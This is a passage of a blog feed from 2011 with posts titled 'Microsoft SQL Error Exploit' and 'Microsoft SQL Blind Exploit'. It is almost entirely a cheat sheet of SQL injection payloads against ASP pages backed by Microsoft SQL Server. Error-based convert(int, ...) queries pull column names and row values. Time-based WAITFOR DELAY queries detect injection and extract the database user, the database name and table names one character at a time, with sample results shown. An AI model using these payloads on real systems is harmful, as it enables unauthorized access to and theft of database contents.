<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1 column_name from </span><span style="color:#a8a8a8;">DBNAME</span><span style="color:#fdb910;">.information_schema.columns where table_name=&#8217;</span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">&#8216; and column_name&gt;&#8217;</span><span style="color:#a8a8a8;">COLUMN-NAME-2</span><span style="color:#fdb910;">&#8216;))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">COLUMN NAME  3</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 1st FIELD OF 1st ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">COLUMN-NAME-1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">FIELD 1 VALUE</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 2nd FIELD OF 1st ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">COLUMN-NAME-2</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">FIELD 2 VALUE</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 3nd FIELD OF 1st ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">COLUMN-NAME-3</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;">))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">FIELD 3 VALUE</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 1st FIELD OF 2nd ROW</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">COLUMN-NAME-1</span><span style="color:#fdb910;"> from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1</span><span style="color:#fdb910;"> where </span><span style="color:#a8a8a8;">COLUMN-NAME-1</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">FIELD-1-VALUE</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> COLUMN-NAME-1 </span><span style="color:#fdb910;">desc))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">FIELD 1 VALUE OF 2ND ROW</span>]&#8216; to a column of data type int.</span>&nbsp;</td>
</tr>
</tbody>
</table>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%" height="12"><strong><span style="font-family:Tahoma;font-size:xx-small;">ERROR SQL INJECTION &#8211; EXTRACT 1st FIELD OF 3nd ROW</span></strong></td>
</tr>
<tr>
<td width="3%" height="98"></td>
<td width="97%" height="98"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#fdb910;">1  or 1=convert(int,(select top 1</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">COLUMN-NAME-1</span><span style="color:#ff3300;"> </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> </span><span style="color:#a8a8a8;">TABLE-NAME-1 </span><span style="color:#fdb910;">where </span><span style="color:#a8a8a8;">COLUMN-NAME-1</span><span style="color:#fdb910;"> NOT in (&#8216;</span><span style="color:#a8a8a8;">FIELD-2-VALUE</span><span style="color:#fdb910;">&#8216;) order by</span><span style="color:#a8a8a8;"> COLUMN-NAME-1 </span><span style="color:#fdb910;">desc))&#8211;</span></span><span style="font-family:Tahoma;font-size:xx-small;">Syntax error converting the nvarchar value &#8216;[<span style="color:#ff3300;">FIELD 1 VALUE OF 3RD ROW</span>]&#8216; to a column of data type int.</span></td>
</tr>
</tbody>
</table>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/199/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/199/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/199/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=199&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-error-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>
	</item>
		<item>
		<title>Microsoft SQL Blind Exploit</title>
		<link>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-blind-exploit/</link>
		<comments>http://andiwijaya.wordpress.com/2011/12/31/microsoft-sql-blind-exploit/#comments</comments>
		<pubDate>Fri, 30 Dec 2011 17:35:06 +0000</pubDate>
		<dc:creator>Andi Wijaya</dc:creator>
				<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://andiwijaya.wordpress.com/?p=196</guid>
		<description><![CDATA[BLIND SQL INJECTION &#8211; DETECTION Integer Injection: http://[site]/page.asp?id=1; WAITFOR DELAY &#8217;00:00:10&#8216;&#8211; (+10 seconds) String Injection: http://[site]/page.asp?id=x&#8217;; WAITFOR DELAY &#8216;00:00:10&#8216;&#8211; (+10 seconds)&#160; BLIND SQL INJECTION &#8211; EXTRACT DATABASE USER 3 - Total Characters http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY &#8216;00:00:10&#8216;&#8211; http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY &#8216;00:00:10&#8216;&#8211; http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY &#8216;00:00:10&#8216;&#8211; (+10 seconds) D  &#8211; 1st Character http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))&#62;97) WAITFOR DELAY &#8216;00:00:10&#8216;&#8211; (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=196&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<table id="AutoNumber1" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; DETECTION</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<strong>Integer Injection:</strong><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">1; </span><span style="color:#fdb910;">WAITFOR DELAY</span><span style="color:#fdb910;"> &#8217;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211; </span>(+10 seconds)<span style="color:#fdb910;"><br />
</span><br />
<strong>String Injection:</strong><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=</span><span style="color:#ff3300;">x&#8217;; </span><span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211; </span>(+10 seconds)</span>&nbsp;</td>
</tr>
</tbody>
</table>
<p><strong></strong></p>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%">
<strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT DATABASE USER</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%">
<span style="font-family:Tahoma;"><strong><span style="font-size:x-small;">3 - </span></strong></span><strong><span style="font-family:Tahoma;font-size:xx-small;">Total Characters</span></strong><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">LEN</span><span style="color:#fdb910;">(</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=<strong>1</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">LEN</span><span style="color:#fdb910;">(</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=<strong>2</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">LEN</span><span style="color:#fdb910;">(</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=<strong>3</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)</span><br />
<strong><span style="font-family:Tahoma;font-size:xx-small;"><br />
</span><span style="font-family:Tahoma;font-size:x-small;">D</span><span style="font-family:Tahoma;font-size:xx-small;">  &#8211; 1st </span></strong><span style="font-family:Tahoma;"><strong><span style="font-size:xx-small;">Character</span></strong></span><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">&gt;</span><strong><span style="color:#ff3300;">97</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">98</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">99</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> </span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">100</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211; </span>(+10 seconds)</span></p>
<p><strong><span style="font-family:Tahoma;font-size:x-small;">B - </span><span style="font-family:Tahoma;font-size:xx-small;">2nd </span></strong><span style="font-family:Tahoma;"><strong><span style="font-size:xx-small;">Character</span></strong></span><br />
<span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">&gt;</span><strong><span style="color:#ff3300;">97</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">98</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)</span></p>
<p><strong><span style="font-family:Tahoma;font-size:x-small;">O - </span><span style="font-family:Tahoma;font-size:xx-small;">3rd </span></strong><span style="font-family:Tahoma;"><strong><span style="font-size:xx-small;">Character</span></strong></span><strong><br />
</strong><span style="font-family:Tahoma;font-size:xx-small;"><span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">&gt;<strong>97</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">&gt;<strong>115</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> <span style="color:#a8a8a8;"><br />
http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">&gt;<strong>105</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">&gt;</span><strong><span style="color:#ff3300;">110</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>109</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">USER</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">110</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Database User = DBO</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<p><strong></strong></div>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT DATABASE NAME</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"> <span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">LEN</span><span style="color:#fdb910;">(</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">)=</span><strong><span style="color:#ff3300;">8</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>112</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211; </span>(+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">2</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>114</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">3</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">111</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">4</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>45</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211; </span>(+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">5</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>100</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">6</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>98</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">7</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>45</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((</span><span style="color:#ff3300;">DB_NAME()</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">8</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>49</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8216;</span><span style="color:#ff3300;">00:00:10</span><span style="color:#fdb910;">&#8216;&#8211;</span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;">Database Name =</span><span style="font-family:Tahoma;font-size:x-small;"> </span><span style="font-family:Tahoma;font-size:xx-small;">PRO-DB-1</span></strong></p>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<p><strong></strong></div>
<div align="center"><strong></strong></p>
<table id="AutoNumber2" width="90%" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td colspan="2" width="100%"><strong><span style="font-family:Tahoma;font-size:xx-small;">BLIND SQL INJECTION &#8211; EXTRACT 1st  DATABASE TABLE</span></strong></td>
</tr>
<tr>
<td width="3%"></td>
<td width="97%"><span style="font-family:Tahoma;font-size:xx-small;"><br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">LEN</span><span style="color:#fdb910;">(SELECT TOP 1</span><span style="color:#ff3300;"> NAME </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=&#8217;U&#8217;</span><span style="color:#fdb910;">)</span><span style="color:#ff3300;">=</span><strong><span style="color:#ff3300;">5</span></strong><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)<br />
<span style="color:#a8a8a8;">http://[site]/page.asp?id=1</span><span style="color:#fdb910;">; IF (</span><span style="color:#ff3300;">ASCII</span><span style="color:#fdb910;">(lower(substring((SELECT TOP 1</span><span style="color:#ff3300;"> NAME </span><span style="color:#fdb910;">from</span><span style="color:#ff3300;"> sysobjects </span><span style="color:#fdb910;">where</span><span style="color:#ff3300;"> xtype=char(85)</span><span style="color:#fdb910;">),</span><strong><span style="color:#ff3300;">1</span></strong><span style="color:#fdb910;">,1)))</span><span style="color:#ff3300;">=<strong>117</strong></span><span style="color:#fdb910;">)</span> <span style="color:#fdb910;">WAITFOR DELAY &#8217;00:00:10&#8242;&#8211; </span> (+10 seconds)</span><strong><span style="font-family:Tahoma;font-size:xx-small;"> </span></strong><br />
